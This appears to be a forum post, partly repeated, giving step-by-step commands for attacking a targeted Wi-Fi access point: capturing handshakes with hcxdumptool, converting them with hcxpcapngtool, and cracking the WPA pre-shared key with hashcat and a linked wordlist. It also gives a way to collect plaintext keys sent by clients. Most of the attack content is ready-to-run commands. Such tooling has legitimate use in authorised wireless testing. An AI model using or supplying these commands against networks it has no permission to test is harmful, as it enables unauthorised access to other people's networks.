$ hcxdumptool --help will show you the correct syntax
add target AP_MC to filterlist.txt (format 112233445566)
replace --filterlist with --filterlist_ap
replace --enable_status with --enable_status=31
replace -o hash with -o dump.pcapng
Do not(!) use hcxdumptool in combination with airmon-ng. You should have received many warnings during start up of hcxdumptool that it isn't a good idea.
hcxdumptool uses an own monitor mode and will show you the services that take access to the interface. You have to stop them by hand!
The complete command line should look like this:
To convert the traffic to hashcat format, run hcxpcapngtool (latest git head):
Get a good wordlist:
https://3wifi.stascorp.com/3wifi-dic-2020-03-02.7z
To recover the PSK run hashcat (latest git head):
Alternative (some CLIENTs transmit PSK in plain/clear):
run hcxdumptool 24/7
convert to hashcat format:
run hashcat
To get driver type and to test that your interface/driver is suitable, run:
BTW:
If you understand Spanish (WiFislax forum: search for hcx):
https://foro.seguridadwireless.net/
If you understand Russian (something about wordlists):
https://antichat.com/threads/281655/page-179
add target AP_MC to filterlist.txt (format 112233445566)
replace --filterlist with --filterlist_ap
replace --enable_status with --enable_status=31
replace -o hash with -o dump.pcapng
Do not(!) use hcxdumptool in combination with airmon-ng. You should have received many warnings during start up of hcxdumptool that it isn't a good idea.
hcxdumptool uses an own monitor mode and will show you the services that take access to the interface. You have to stop them by hand!
The complete command line should look like this:
Code:
$ hcxdumptool -i <interface> -o dump.pcapng --filterlist_ap=filter.txt --filtermode=2 --enable_status=31To convert the traffic to hashcat format, run hcxpcapngtool (latest git head):
Code:
$ hcxpcapngtool -o test.22000 *.pcapngGet a good wordlist:
https://3wifi.stascorp.com/3wifi-dic-2020-03-02.7z
To recover the PSK run hashcat (latest git head):
Code:
$ hashcat -m 22000 test.22000 3WiFi_WiFiKey.txtAlternative (some CLIENTs transmit PSK in plain/clear):
run hcxdumptool 24/7
convert to hashcat format:
Code:
$ hcxpcapngtool -o test.22000 -E wordlist *.pcapngrun hashcat
Code:
$ hashcat -m 22000 test.22000 wordlistTo get driver type and to test that your interface/driver is suitable, run:
Code:
$ hcxdumptool -I
$ hcxdumptool -i <interface> --check_driver
$ hcxdumptool -i <interface> --check_injectionBTW:
If you understand Spanish (WiFislax forum: search for hcx):
https://foro.seguridadwireless.net/
If you understand Russian (something about wordlists):
https://antichat.com/threads/281655/page-179
